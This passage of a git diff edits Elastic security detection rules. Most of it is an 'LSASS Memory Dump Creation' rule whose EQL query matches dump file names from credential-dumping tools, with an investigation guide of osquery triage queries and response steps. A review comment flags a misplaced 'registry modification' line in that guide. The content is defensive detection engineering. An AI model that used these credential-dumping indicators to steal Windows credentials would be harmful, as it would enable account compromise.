services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", 
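Review bot: The investigation guide in the new `note` value still tells the analyst to search for logon events (4624) "after the registry modification", although this rule fires on the creation of an LSASS memory dump file and nothing in the rule touches the registry, so the sentence reads as carried over from a registry-focused guide. I would reword it to `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the dump file was created.` The same sentence appears in the `note` hunks for the _106 and _107 revisions of this rule below, and in the tail of the preceding revision's hunk at the top of this chunk. The commit only replaces `\u003e`, `\u003c` and `\u0026` escapes with literal characters, so this is pre-existing wording rather than something the change introduced.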
@@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json index 13198bac173..ba3b6871898 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", 
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json index c457361231b..362ef189aba 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and\n file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\"\n ) and\n file.path : (\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\MSSQL\\\\LOG\\\\SQLDmpr*.mdmp\"\n )\n ) and\n\n not (\n process.executable : \"?:\\\\Windows\\\\system32\\\\WerFault.exe\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\",\n \"?:\\\\Windows\\\\System32\\\\%LOCALAPPDATA%\\\\CrashDumps\\\\lsass.exe.*.dmp\"\n )\n )\n", "references": [ "https://github.com/outflanknl/Dumpert", 
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json
index 08790ae1b87..154b55c7fd5 100644
--- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json
index 48ce6e70a8c..2fdf4f9c26a 100644
--- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json
index 4f76c7c3936..83cb71bf3e9 100644
--- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json
index 643f1897c2c..5860cc69d39 100644
--- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json
index b98034e0622..c5ca7b454d1 100644
--- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json
index d422c79a397..b7dc7d9d133 100644
--- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json
index 312f3fb6ae2..6b239bb6b9b 100644
--- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4.json
new file mode 100644
index 00000000000..07e4c5e39d9
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4.json
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user copies a Google spreadsheet, form, document or script from an external drive. Sequence logic has been added to also detect when a user grants a custom Google application permission via OAuth shortly after. An adversary may send a phishing email to the victim with a Drive object link where \"copy\" is included in the URI, thus copying the object to the victim's drive. If a container-bound script exists within the object, execution will require permission access via OAuth in which the user has to accept.", + "false_positives": [ + "Google Workspace users typically share Drive resources with a shareable link where parameters are edited to indicate when it is viewable or editable by the intended recipient. It is uncommon for a user in an organization to manually copy a Drive object from an external drive to their corporate drive. This may happen where users find a useful spreadsheet in a public drive, for example, and replicate it to their Drive. It is uncommon for the copied object to execute a container-bound script either unless the user was intentionally aware, 